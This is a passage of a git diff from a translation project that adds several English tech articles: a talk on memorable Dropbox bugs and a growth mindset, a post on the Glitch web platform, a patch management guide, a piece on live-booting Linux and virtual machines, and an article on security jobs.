idea. There’s a pretty limited set of places where we could address this, and instead we decide to basically silence the exception and move on. Often this kind of bug resolves after the client restarts. + +### Unlikely bugs aren’t impossible + +This is one of my favorite bugs for a couple of reasons. The first is that it’s a reminder of the difference between unlikely and impossible. At sufficient scale, unlikely events start to happen at a noticable rate. + +### Social bugs + +My second favorite thing about this bug is that it’s a tremendously social one. This bug can crop up anywhere that the desktop client talks to the server, which is a lot of different endpoints and components in the system. This meant that a lot of different engineers at Dropbox would see versions of the bug. The first time you see it, you can  _really_  scratch your head, but after that it’s easy to diagnose, and the investigation is really quick: you look at the middle character and see if it’s an `l`. + +### Cultural differences + +One interesting side-effect of this bug was that it exposed a cultural difference between the server and client teams. Occasionally this bug would be spotted by a member of the server team and investigated from there. If one of your  _servers_  is flipping bits, that’s probably not random chance – it’s probably memory corruption, and you need to find the affected machine and get it out of the pool as fast as possible or you risk corrupting a lot of user data. That’s an incident, and you need to respond quickly. But if the user’s machine is corrupting data, there’s not a lot you can do. + +### Share your bugs + +So if you’re investigating a confusing bug, especially one in a big system, don’t forget to talk to people about it. Maybe your colleagues have seen a bug shaped like this one before. If they have, you might save a lot of time. And if they haven’t, don’t forget to tell people about the solution once you’ve figured it out – write it up or tell the story in your team meeting. Then the next time your teams hits something similar, you’ll all be more prepared. + +### How bugs can help you learn + +### Recurse Center + +Before I joined Dropbox, I worked for the Recurse Center. The idea behind RC is that it’s a community of self-directed learners spending time together getting better as programmers. That is the full extent of the structure of RC: there’s no curriculum or assignments or deadlines. The only scoping is a shared goal of getting better as a programmer. We’d see people come to participate in the program who had gotten CS degrees but didn’t feel like they had a solid handle on practical programming, or people who had been writing Java for ten years and wanted to learn Clojure or Haskell, and many other profiles as well. + +My job there was as a facilitator, helping people make the most of the lack of structure and providing guidance based on what we’d learned from earlier participants. So my colleagues and I were very interested in the best techniques for learning for self-motivated adults. + +### Deliberate Practice + +There’s a lot of different research in this space, and one of the ones I think is most interesting is the idea of deliberate practice. Deliberate practice is an attempt to explain the difference in performance between experts & amateurs. And the guiding principle here is that if you look just at innate characteristics – genetic or otherwise – they don’t go very far towards explaining the difference in performance. So the researchers, originally Ericsson, Krampe, and Tesch-Romer, set out to discover what did explain the difference. And what they settled on was time spent in deliberate practice. + +Deliberate practice is pretty narrow in their definition: it’s not work for pay, and it’s not playing for fun. You have to be operating on the edge of your ability, doing a project appropriate for your skill level (not so easy that you don’t learn anything and not so hard that you don’t make any progress). You also have to get immediate feedback on whether or not you’ve done the thing correctly. + +This is really exciting, because it’s a framework for how to build expertise. But the challenge is that as programmers this is really hard advice to apply. It’s hard to know whether you’re operating at the edge of your ability. Immediate corrective feedback is very rare – in some cases you’re lucky to get feedback ever, and in other cases maybe it takes months. You can get quick feedback on small things in the REPL and so on, but if you’re making a design decision or picking a technology, you’re not going to get feedback on those things for quite a long time. + +But one category of programming where deliberate practice is a useful model is debugging. If you wrote code, then you had a mental model of how it worked when you wrote it. But your code has a bug, so your mental model isn’t quite right. By definition you’re on the boundary of your understanding – so, great! You’re about to learn something new. And if you can reproduce the bug, that’s a rare case where you can get immediate feedback on whether or not your fix is correct. + +A bug like this might teach you something small about your program, or you might learn something larger about the system your code is running in. Now I’ve got a story for you about a bug like that. + +### Bug #2 + +This bug also one that I encountered at Dropbox. At the time, I was investigating why some desktop client weren’t sending logs as consistently as we expected. I’d started digging into the client logging system and discovered a bunch of interesting bugs. I’ll tell you only the subset of those bugs that is relevant to this story. + +Again here’s a very simplified architecture of the system. + + +``` + +--------------+ + | | + +---+ +----------> | LOG SERVER | + |log| | | | + +---+ | +------+-------+ + | | + +-----+----+ | 200 ok + | | | + | CLIENT | <-----------+ + | | + +-----+----+ + ^ + +--------+--------+--------+ + | ^ ^ | + +--+--+ +--+--+ +--+--+ +--+--+ + | log | | log | | log | | log | + | | | | | | | | + | | | | | | | | + +-----+ +-----+ +-----+ +-----+ +``` + +The desktop client would generate logs. Those logs were compress, encrypted, and written to disk. Then every so often the client would send them up to the server. The client would read a log off of disk and send it to the log server. The server would decrypt it and store it, then respond with a 200. + +If the client couldn’t reach the log server, it wouldn’t let the log directory grow unbounded. After a certain point it would start deleting logs to keep the directory under a maximum size. + +The first two bugs were not a big deal on their own. The first one was that the desktop client sent logs up to the server starting with the oldest one instead of starting with the newest. This isn’t really what you want – for example, the server would tell the client to send logs if the client reported an exception, so probably you care about the logs that just happened and not the oldest logs that happen to be on disk. + +The second bug was similar to the first: if the log directory hit its maximum size, the client would delete the logs starting with the newest instead of starting with the oldest. Again, you lose log files either way, but you probably care less about the older ones. + +The third bug had to do with the encryption. Sometimes, the server would be unable to decrypt a log file. (We generally didn’t figure out why – maybe it was a bitflip.) We weren’t handling this error correctly on the backend, so the server would reply with a 500\. The client would behave reasonably in the face of a 500: it would assume that the server was down. So it would stop sending log files and not try to send up any of the others. + +Returning a 500 on a corrupted log file is clearly not the right behavior. You could consider returning a 400, since it’s a problem with the client request. But the client also can’t fix the problem – if the log file can’t be decrypted now, we’ll never be able to decrypt it in the future. What you really want the client to do is just delete the log and move on. In fact, that’s the default behavior when the client gets a 200 back from the server for a log file that was successfully stored. So we said, ok – if the log file can’t be decrypted, just return a 200. + +All of these bugs were straightforward to fix. The first two bugs were on the client, so we’d fixed them on the alpha build but they hadn’t gone out to the majority of clients. The third bug we fixed on the server and deployed. + +### 📈 + +Suddenly traffic to the log cluster spikes. The serving team reaches out to us to ask if we know what’s going on. It takes me a minute to put all the pieces together. + +Before these fixes, there were four things going on: + +1. Log files were sent up starting with the oldest + +2. Log files were deleted starting with the newest + +3. If the server couldn’t decrypt a log file it would 500 + +4. If the client got a 500 it would stop sending logs + +A client with a corrupted log file would try to send it, the server would 500, the client would give up sending logs. On its next run, it would try to send the same file again, fail again, and give up again. Eventually the log directory would get full, at which point the client would start deleting its newest files, leaving the corrupted one on disk. + +The upshot of these three bugs: if a client ever had a corrupted log file, we would never see logs from that client again. + +The problem is that there were a lot more clients in this state than we thought. Any client with a single corrupted file had been dammed up from sending logs to the server. Now that dam was cleared, and all of them were sending up the rest of the contents of their log directories. + +### Our options + +Ok, there’s a huge flood of traffic coming from machines around the world. What can we do? (This is a fun thing about working at a company with Dropbox’s scale, and particularly Dropbox’s scale of desktop clients: you can trigger a self-DDOS very easily.) + +The first option when you do a deploy and things start going sideways is to rollback. Totally reasonable choice, but in this case, it wouldn’t have helped us. The state that we’d transformed wasn’t the state on the server but the state on the client – we’d deleted those files. Rolling back the server would prevent additional clients from entering this state but it wouldn’t solve the problem. + +What about increasing the size of the logging cluster? We did that – and started getting even more requests, now that we’d increased our capacity. We increased it again, but you can’t do that forever. Why not? This cluster isn’t isolated. It’s making requests into another cluster, in this case to handle exceptions. If you have a DDOS pointed at one cluster, and you keep scaling that cluster, you’re going to knock over its depedencies too, and now you have two problems. + +Another option we considered was shedding load – you don’t need every single log file, so can we just drop requests. One of the challenges here was that we didn’t have an easy way to tell good traffic from bad. We couldn’t quickly differentiate which log files were old and which were new. + +The solution we hit on is one that’s been used at Dropbox on a number of different occassions: we have a custom header, `chillout`, which every client in the world respects. If the client gets a response with this header, then it doesn’t make any requests for the provided number of seconds. Someone very wise added this to the Dropbox client very early on, and it’s come in handy more than once over the years. The logging server didn’t have the ability to set that header, but that’s an easy problem to solve. So two of my colleagues, Isaac Goldberg and John Lai, implemented support for it. We set the logging cluster chillout to two minutes initially and then managed it down as the deluge subsided over the next couple of days. + +### Know your system + +The first lesson from this bug is to know your system. I had a good mental model of the interaction between the client and the server, but I wasn’t thinking about what would happen when the server was interacting with all the clients at once. There was a level of complexity that I hadn’t thought all the way through. + +### Know your tools + +The second lesson is to know your tools. If things go sideways, what options do you have? Can you reverse your migration? How will you know if things are going sideways and how can you discover more? All of those things are great to know before a crisis – but if you don’t, you’ll learn them during a crisis and then never forget. + +### Feature flags & server-side gating + +The third lesson is for you if you’re writing a mobile or a desktop application:  _You need server-side feature gating and server-side flags._  When you discover a problem and you don’t have server-side controls, the resolution might take days or weeks as you push out a new release or submit a new version to the app store. That’s a bad situation to be in. The Dropbox desktop client isn’t going through an app store review process, but just pushing out a build to tens of millions of clients takes time. Compare that to hitting a problem in your feature and flipping a switch on the server: ten minutes later your problem is resolved. + +This strategy is not without its costs. Having a bunch of feature flags in your code adds to the complexity dramatically. You get a combinatoric problem with your testing: what if feature A is enabled and feature B, or just one, or neither – multiplied across N features. It’s extremely difficult to get engineers to clean up their feature flags after the fact (and I was also guilty of this). Then for the desktop client there’s multiple versions in the wild at the same time, so it gets pretty hard to reason about. + +But the benefit – man, when you need it, you really need it. + +# How to love bugs + +I’ve talked about some bugs that I love and I’ve talked about why to love bugs. Now I want to tell you how to love bugs. If you don’t love bugs yet, I know of exactly one way to learn, and that’s to have a growth mindset. + +The sociologist Carol Dweck has done a ton of interesting research about how people think about intelligence. She’s found that there are two different frameworks for thinking about intelligence. The first, which she calls the fixed mindset, holds that intelligence is a fixed trait, and people can’t change how much of it they have. The other mindset is a growth mindset. Under a growth mindset, people believe that intelligence is malleable and can increase with effort. + +Dweck found that a person’s theory of intelligence – whether they hold a fixed or growth mindset – can significantly influence the way they select tasks to work on, the way they respond to challenges, their cognitive performance, and even their honesty. + +[I also talked about a growth mindset in my Kiwi PyCon keynote, so here are just a few excerpts. You can read the full transcript [here][7].] + +Findings about honesty: + +> After this, they had the students write letters to pen pals about the study, saying “We did this study at school, and here’s the score that I got.” They found that  _almost half of the students praised for intelligence lied about their scores_ , and almost no one who was praised for working hard was dishonest. + +On effort: + +> Several studies found that people with a fixed mindset can be reluctant to really exert effort, because they believe it means they’re not good at the thing they’re working hard on. Dweck notes, “It would be hard to maintain confidence in your ability if every time a task requires effort, your intelligence is called into question.” + +On responding to confusion: + +> They found that students with a growth mindset mastered the material about 70% of the time, regardless of whether there was a confusing passage in it. Among students with a fixed mindset, if they read the booklet without the confusing passage, again about 70% of them mastered the material. But the fixed-mindset students who encountered the confusing passage saw their mastery drop to 30%. Students with a fixed mindset were pretty bad at recovering from being confused. + +These findings show that a growth mindset is critical while debugging. We have to recover from confusion, be candid about the limitations of our understanding, and at times really struggle on the way to finding solutions – all of which is easier and less painful with a growth mindset. + +### Love your bugs + +I learned to love bugs by explicitly celebrating challenges while working at the Recurse Center. A participant would sit down next to me and say, “[sigh] I think I’ve got a weird Python bug,” and I’d say, “Awesome, I  _love_  weird Python bugs!” First of all, this is definitely true, but more importantly, it emphasized to the participant that finding something where they struggled an accomplishment, and it was a good thing for them to have done that day. + +As I mentioned, at the Recurse Center there are no deadlines and no assignments, so this attitude is pretty much free. I’d say, “You get to spend a day chasing down this weird bug in Flask, how exciting!” At Dropbox and later at Pilot, where we have a product to ship, deadlines, and users, I’m not always uniformly delighted about spending a day on a weird bug. So I’m sympathetic to the reality of the world where there are deadlines. However, if I have a bug to fix, I have to fix it, and being grumbly about the existence of the bug isn’t going to help me fix it faster. I think that even in a world where deadlines loom, you can still apply this attitude. + +If you love your bugs, you can have more fun while you’re working on a tough problem. You can be less worried and more focused, and end up learning more from them. Finally, you can share a bug with your friends and colleagues, which helps you and your teammates. + +### Obrigada! + +My thanks to folks who gave me feedback on this talk and otherwise contributed to my being there: + +* Sasha Laundy + +* Amy Hanlon + +* Julia Evans + +* Julian Cooper + +* Raphael Passini Diniz and the rest of the Python Brasil organizing team + +-------------------------------------------------------------------------------- + +via: http://akaptur.com/blog/2017/11/12/love-your-bugs/ + +作者:[Allison Kaptur ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://akaptur.com/about/ +[1]:http://2017.pythonbrasil.org.br/# +[2]:http://www.youtube.com/watch?v=h4pZZOmv4Qs +[3]:http://www.pilot.com/ +[4]:http://www.dropbox.com/ +[5]:http://www.recurse.com/ +[6]:http://www.youtube.com/watch?v=ETgNLF_XpEM +[7]:http://akaptur.com/blog/2015/10/10/effective-learning-strategies-for-programmers/ diff --git a/sources/tech/20171113 Glitch write fun small web projects instantly.md b/sources/tech/20171113 Glitch write fun small web projects instantly.md new file mode 100644 index 0000000000..734853ce51 --- /dev/null +++ b/sources/tech/20171113 Glitch write fun small web projects instantly.md @@ -0,0 +1,76 @@ +translating---geekpi + +Glitch: write fun small web projects instantly +============================================================ + +I just wrote about Jupyter Notebooks which are a fun interactive way to write Python code. That reminded me I learned about Glitch recently, which I also love!! I built a small app to [turn of twitter retweets][2] with it. So! + +[Glitch][3] is an easy way to make Javascript webapps. (javascript backend, javascript frontend) + +The fun thing about glitch is: + +1. you start typing Javascript code into their web interface + +2. as soon as you type something, it automagically reloads the backend of your website with the new code. You don’t even have to save!! It autosaves. + +So it’s like Heroku, but even more magical!! Coding like this (you type, and the code runs on the public internet immediately) just feels really **fun** to me. + +It’s kind of like sshing into a server and editing PHP/HTML code on your server and having it instantly available, which I kind of also loved. Now we have “better deployment practices” than “just edit the code and it is instantly on the internet” but we are not talking about Serious Development Practices, we are talking about writing tiny programs for fun. + +### glitch has awesome example apps + +Glitch seems like fun nice way to learn programming! + +For example, there’s a space invaders game (code by [Mary Rose Cook][4]) at [https://space-invaders.glitch.me/][5]. The thing I love about this is that in just a few clicks I can + +1. click “remix this” + +2. start editing the code to make the boxes orange instead of black + +3. have my own space invaders game!! Mine is at [http://julias-space-invaders.glitch.me/][1]. (i just made very tiny edits to make it orange, nothing fancy) + +They have tons of example apps that you can start from – for instance [bots][6], [games][7], and more. + +### awesome actually useful app: tweetstorms + +The way I learned about Glitch was from this app which shows you tweetstorms from a given user: [https://tweetstorms.glitch.me/][8]. + +For example, you can see [@sarahmei][9]’s tweetstorms at [https://tweetstorms.glitch.me/sarahmei][10] (she tweets a lot of good tweetstorms!). + +### my glitch app: turn off retweets + +When I learned about Glitch I wanted to turn off retweets for everyone I follow on Twitter (I know you can do it in Tweetdeck!) and doing it manually was a pain – I had to do it one person at a time. So I wrote a tiny Glitch app to do it for me! + +I liked that I didn’t have to set up a local development environment, I could just start typing and go! + +Glitch only supports Javascript and I don’t really know Javascript that well (I think I’ve never written a Node program before), so the code isn’t awesome. But I had a really good time writing it – being able to type and just see my code running instantly was delightful. Here it is: [https://turn-off-retweets.glitch.me/][11]. + +### that’s all! + +Using Glitch feels really fun and democratic. Usually if I want to fork someone’s web project and make changes I wouldn’t do it – I’d have to fork it, figure out hosting, set up a local dev environment or Heroku or whatever, install the dependencies, etc. I think tasks like installing node.js dependencies used to be interesting, like “cool i am learning something new” and now I just find them tedious. + +So I love being able to just click “remix this!” and have my version on the internet instantly. + + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ + +作者:[Julia Evans ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/ +[1]:http://julias-space-invaders.glitch.me/ +[2]:https://turn-off-retweets.glitch.me/ +[3]:https://glitch.com/ +[4]:https://maryrosecook.com/ +[5]:https://space-invaders.glitch.me/ +[6]:https://glitch.com/handy-bots +[7]:https://glitch.com/games +[8]:https://tweetstorms.glitch.me/ +[9]:https://twitter.com/sarahmei +[10]:https://tweetstorms.glitch.me/sarahmei +[11]:https://turn-off-retweets.glitch.me/ diff --git a/sources/tech/20171114 Sysadmin 101 Patch Management.md b/sources/tech/20171114 Sysadmin 101 Patch Management.md new file mode 100644 index 0000000000..55ca09da87 --- /dev/null +++ b/sources/tech/20171114 Sysadmin 101 Patch Management.md @@ -0,0 +1,61 @@ +【翻译中 @haoqixu】Sysadmin 101: Patch Management +============================================================ + +* [HOW-TOs][1] + +* [Servers][2] + +* [SysAdmin][3] + + +A few articles ago, I started a Sysadmin 101 series to pass down some fundamental knowledge about systems administration that the current generation of junior sysadmins, DevOps engineers or "full stack" developers might not learn otherwise. I had thought that I was done with the series, but then the WannaCry malware came out and exposed some of the poor patch management practices still in place in Windows networks. I imagine some readers that are still stuck in the Linux versus Windows wars of the 2000s might have even smiled with a sense of superiority when they heard about this outbreak. + +The reason I decided to revive my Sysadmin 101 series so soon is I realized that most Linux system administrators are no different from Windows sysadmins when it comes to patch management. Honestly, in some areas (in particular, uptime pride), some Linux sysadmins are even worse than Windows sysadmins regarding patch management. So in this article, I cover some of the fundamentals of patch management under Linux, including what a good patch management system looks like, the tools you will want to put in place and how the overall patching process should work. + +### What Is Patch Management? + +When I say patch management, I'm referring to the systems you have in place to update software already on a server. I'm not just talking about keeping up with the latest-and-greatest bleeding-edge version of a piece of software. Even more conservative distributions like Debian that stick with a particular version of software for its "stable" release still release frequent updates that patch bugs or security holes. + +Of course, if your organization decided to roll its own version of a particular piece of software, either because developers demanded the latest and greatest, you needed to fork the software to apply a custom change, or you just like giving yourself extra work, you now have a problem. Ideally you have put in a system that automatically packages up the custom version of the software for you in the same continuous integration system you use to build and package any other software, but many sysadmins still rely on the outdated method of packaging the software on their local machine based on (hopefully up to date) documentation on their wiki. In either case, you will need to confirm that your particular version has the security flaw, and if so, make sure that the new patch applies cleanly to your custom version. + +### What Good Patch Management Looks Like + +Patch management starts with knowing that there is a software update to begin with. First, for your core software, you should be subscribed to your Linux distribution's security mailing list, so you're notified immediately when there are security patches. If there you use any software that doesn't come from your distribution, you must find out how to be kept up to date on security patches for that software as well. When new security notifications come in, you should review the details so you understand how severe the security flaw is, whether you are affected and gauge a sense of how urgent the patch is. + +Some organizations have a purely manual patch management system. With such a system, when a security patch comes along, the sysadmin figures out which servers are running the software, generally by relying on memory and by logging in to servers and checking. Then the sysadmin uses the server's built-in package management tool to update the software with the latest from the distribution. Then the sysadmin moves on to the next server, and the next, until all of the servers are patched. + +There are many problems with manual patch management. First is the fact that it makes patching a laborious chore. The more work patching is, the more likely a sysadmin will put it off or skip doing it entirely. The second problem is that manual patch management relies too much on the sysadmin's ability to remember and recall all of the servers he or she is responsible for and keep track of which are patched and which aren't. This makes it easy for servers to be forgotten and sit unpatched. + +The faster and easier patch management is, the more likely you are to do it. You should have a system in place that quickly can tell you which servers are running a particular piece of software at which version. Ideally, that system also can push out updates. Personally, I prefer orchestration tools like MCollective for this task, but Red Hat provides Satellite, and Canonical provides Landscape as central tools that let you view software versions across your fleet of servers and apply patches all from a central place. + +Patching should be fault-tolerant as well. You should be able to patch a service and restart it without any overall down time. The same idea goes for kernel patches that require a reboot. My approach is to divide my servers into different high availability groups so that lb1, app1, rabbitmq1 and db1 would all be in one group, and lb2, app2, rabbitmq2 and db2 are in another. Then, I know I can patch one group at a time without it causing downtime anywhere else. + +So, how fast is fast? Your system should be able to roll out a patch to a minor piece of software that doesn't have an accompanying service (such as bash in the case of the ShellShock vulnerability) within a few minutes to an hour at most. For something like OpenSSL that requires you to restart services, the careful process of patching and restarting services in a fault-tolerant way probably will take more time, but this is where orchestration tools come in handy. I gave examples of how to use MCollective to accomplish this in my recent MCollective articles (see the December 2016 and January 2017 issues), but ideally, you should put a system in place that makes it easy to patch and restart services in a fault-tolerant and automated way. + +When patching requires a reboot, such as in the case of kernel patches, it might take a bit more time, but again, automation and orchestration tools can make this go much faster than you might imagine. I can patch and reboot the servers in an environment in a fault-tolerant way within an hour or two, and it would be much faster than that if I didn't need to wait for clusters to sync back up in between reboots. + +Unfortunately, many sysadmins still hold on to the outdated notion that uptime is a badge of pride—given that serious kernel patches tend to come out at least once a year if not more often, to me, it's proof you don't take security seriously. + +Many organizations also still have that single point of failure server that can never go down, and as a result, it never gets patched or rebooted. If you want to be secure, you need to remove these outdated liabilities and create systems that at least can be rebooted during a late-night maintenance window. + +Ultimately, fast and easy patch management is a sign of a mature and professional sysadmin team. Updating software is something all sysadmins have to do as part of their jobs, and investing time into systems that make that process easy and fast pays dividends far beyond security. For one, it helps identify bad architecture decisions that cause single points of failure. For another, it helps identify stagnant, out-of-date legacy systems in an environment and provides you with an incentive to replace them. Finally, when patching is managed well, it frees up sysadmins' time and turns their attention to the things that truly require their expertise. + +______________________ + +Kyle Rankin is senior security and infrastructure architect, the author of many books including Linux Hardening in Hostile Networks, DevOps Troubleshooting and The Official Ubuntu Server Book, and a columnist for Linux Journal. Follow him @kylerankin + +-------------------------------------------------------------------------------- + +via: https://www.linuxjournal.com/content/sysadmin-101-patch-management + +作者:[Kyle Rankin ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxjournal.com/users/kyle-rankin +[1]:https://www.linuxjournal.com/tag/how-tos +[2]:https://www.linuxjournal.com/tag/servers +[3]:https://www.linuxjournal.com/tag/sysadmin +[4]:https://www.linuxjournal.com/users/kyle-rankin diff --git a/sources/tech/20171114 Take Linux and Run With It.md b/sources/tech/20171114 Take Linux and Run With It.md new file mode 100644 index 0000000000..b7b6cb9663 --- /dev/null +++ b/sources/tech/20171114 Take Linux and Run With It.md @@ -0,0 +1,68 @@ +Take Linux and Run With It +============================================================ + +![](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2016-linux-1.jpg) + +![](https://www.linuxinsider.com/images/2015/image-credit-adobe-stock_130x15.gif) + + +"How do you run an operating system?" may seem like a simple question, since most of us are accustomed to turning on our computers and seeing our system spin up. However, this common model is only one way of running an operating system. As one of Linux's greatest strengths is versatility, Linux offers the most methods and environments for running it. + +To unleash the full power of Linux, and maybe even find a use for it you hadn't thought of, consider some less conventional ways of running it -- specifically, ones that don't even require installation on a computer's hard drive. + +### We'll Do It Live! + +Live-booting is a surprisingly useful and popular way to get the full Linux experience on the fly. While hard drives are where OSes reside most of the time, they actually can be installed to most major storage media, including CDs, DVDs and USB flash drives. + +When an OS is installed to some device other than a computer's onboard hard drive and subsequently booted instead of that onboard drive, it's called "live-booting" or running a "live session." + +At boot time, the user simply selects an external storage source for the hardware to look for boot information. If found, the computer follows the external device's boot instructions, essentially ignoring the onboard drive until the next time the user boots normally. Optical media are increasingly rare these days, so by far the most typical form that an external OS-carrying device takes is a USB stick. + +Most mainstream Linux distributions offer a way to run a live session as a way of trying them out. The live session doesn't save any user activity, and the OS resets to the clean default state after every shutdown. + +Live Linux sessions can be used for more than testing a distro, though. One application is for executing system repair for critically malfunctioning onboard (usually also Linux) systems. If an update or configuration made the onboard system unbootable, a full system backup is required, or the hard drive has sustained serious file corruption, the only recourse is to start up a live system and perform maintenance on the onboard drive. + +In these and similar scenarios, the onboard drive cannot be manipulated or corrected while also keeping the system stored on it running, so a live system takes on those burdens instead, leaving all but the problematic files on the onboard drive at rest. + +Live sessions also are perfectly suited for handling sensitive information. If you don't want a computer to retain any trace of the operations executed or information handled on it, especially if you are using hardware you can't vouch for -- like a public library or hotel business center computer -- a live session will provide you all the desktop computing functions to complete your task while retaining no trace of your session once you're finished. This is great for doing online banking or password input that you don't want a computer to remember. + +### Linux Virtually Anywhere + +Another approach for implementing Linux for more on-demand purposes is to run a virtual machine on another host OS. A virtual machine, or VM, is essentially a small computer running inside another computer and contained in a single large file. + +To run a VM, users simply install a hypervisor program (a kind of launcher for the VM), select a downloaded Linux OS image file (usually ending with a ".iso" file extension), and walk through the setup process. + +Most of the settings can be left at their defaults, but the key ones to configure are the amount of RAM and hard drive storage to lease to the VM. Fortunately, since Linux has a light footprint, you don't have to set these very high: 2 GB of RAM and 16 GB of storage should be plenty for the VM while still letting your host OS thrive. + +So what does this offer that a live system doesn't? First, whereas live systems are ephemeral, VMs can retain the data stored on them. This is great if you want to set up your Linux VM for a special use case, like software development or even security. + +When used for development, a Linux VM gives you the solid foundation of Linux's programming language suites and coding tools, and it lets you save your projects right in the VM to keep everything organized. + +If security is your goal, Linux VMs allow you to impose an extra layer between a potential hazard and your system. If you do your browsing from the VM, a malicious program would have to compromise not only your virtual Linux system, but also the hypervisor -- and  _then_ your host OS, a technical feat beyond all but the most skilled and determined adversaries. + +Second, you can start up your VM on demand from your host system, without having to power it down and start it up again as you would have to with a live session. When you need it, you can quickly bring up the VM, and when you're finished, you just shut it down and go back to what you were doing before. + +Your host system continues running normally while the VM is on, so you can attend to tasks simultaneously in each system. + +### Look Ma, No Installation! + +Just as there is no one form that Linux takes, there's also no one way to run it. Hopefully, this brief primer on the kinds of systems you can run has given you some ideas to expand your use models. + +The best part is that if you're not sure how these can help, live booting and virtual machines don't hurt to try!  +![](https://www.ectnews.com/images/end-enn.gif) + +-------------------------------------------------------------------------------- + +via: https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html + +作者:[ Jonathan Terrasi ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html#searchbyline +[1]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html# +[2]:https://www.linuxinsider.com/perl/mailit/?id=84951 +[3]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html +[4]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html diff --git a/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md new file mode 100644 index 0000000000..a0a6b1ed60 --- /dev/null +++ b/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md @@ -0,0 +1,58 @@ +Security Jobs Are Hot: Get Trained and Get Noticed +============================================================ + +![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills") +The Open Source Jobs Report, from Dice and The Linux Foundation, found that professionals with security experience are in high demand for the future.[Used with permission][1] + +The demand for security professionals is real. On [Dice.com][4], 15 percent of the more than 75K jobs are security positions. “Every year in the U.S., 40,000 jobs for information security analysts go unfilled, and employers are struggling to fill 200,000 other cyber-security related roles, according to cyber security data tool [CyberSeek][5]” ([Forbes][6]). We know that there is a fast-increasing need for security specialists, but that the interest level is low. + +### Security is the place to be + +In my experience, few students coming out of college are interested in roles in security; so many people see security as niche. Entry-level tech pros are interested in business analyst or system analyst roles, because of a belief that if you want to learn and apply core IT concepts, you have to stick to analyst roles or those closer to product development. That’s simply not the case. + +In fact, if you’re interested in getting in front of your business leaders, security is the place to be – as a security professional, you have to understand the business end-to-end; you have to look at the big picture to give your company the advantage. + +### Be fearless + +Analyst and security roles are not all that different. Companies continue to merge engineering and security roles out of necessity. Businesses are moving faster than ever with infrastructure and code being deployed through automation, which increases the importance of security being a part of all tech pros day to day lives. In our [Open Source Jobs Report with The Linux Foundation][7], 42 percent of hiring managers said professionals with security experience are in high demand for the future. + +There has never been a more exciting time to be in security. If you stay up-to-date with tech news, you’ll see that a huge number of stories are related to security – data breaches, system failures and fraud. The security teams are working in ever-changing, fast-paced environments. A real challenge lies is in the proactive side of security, finding, and eliminating vulnerabilities while maintaining or even improving the end-user experience.   + +### Growth is imminent + +Of any aspect of tech, security is the one that will continue to grow with the cloud. Businesses are moving more and more to the cloud and that’s exposing more security vulnerabilities than organizations are used to. As the cloud matures, security becomes increasingly important.            + +Regulations are also growing – Personally Identifiable Information (PII) is getting broader all the time. Many companies are finding that they must invest in security to stay in compliance and avoid being in the headlines. Companies are beginning to budget more and more for security tooling and staffing due to the risk of heavy fines, reputational damage, and, to be honest, executive job security.   + +### Training and support + +Even if you don’t choose a security-specific role, you’re bound to find yourself needing to code securely, and if you don’t have the skills to do that, you’ll start fighting an uphill battle. There are certainly ways to learn on-the-job if your company offers that option, that’s encouraged but I recommend a combination of training, mentorship and constant practice. Without using your security skills, you’ll lose them fast with how quickly the complexity of malicious attacks evolve. + +My recommendation for those seeking security roles is to find the people in your organization that are the strongest in engineering, development, or architecture areas – interface with them and other teams, do hands-on work, and be sure to keep the big-picture in mind. Be an asset to your organization that stands out – someone that can securely code and also consider strategy and overall infrastructure health. + +### The end game + +More and more companies are investing in security and trying to fill open roles in their tech teams. If you’re interested in management, security is the place to be. Executive leadership wants to know that their company is playing by the rules, that their data is secure, and that they’re safe from breaches and loss. + +Security that is implemented wisely and with strategy in mind will get noticed. Security is paramount for executives and consumers alike – I’d encourage anyone interested in security to train up and contribute. + + _[Download ][2]the full 2017 Open Source Jobs Report now._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed + +作者:[ BEN COLLEN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/bencollen +[1]:https://www.linux.com/licenses/category/used-permission +[2]:http://bit.ly/2017OSSjobsreport +[3]:https://www.linux.com/files/images/security-skillspng +[4]:http://www.dice.com/ +[5]:http://cyberseek.org/index.html#about +[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163 +[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/ diff --git a/sources/tech/20171115 Why and How to Set an Open Source Strategy.md b/sources/tech/20171115 Why and How to Set an Open Source Strategy.md new file mode 100644 index 0000000000..79ec071b4d --- /dev/null +++ b/sources/tech/20171115 Why and How to Set an Open Source Strategy.md @@ -0,0 +1,120 @@ +Why and How to Set an Open Source Strategy +============================================================ + 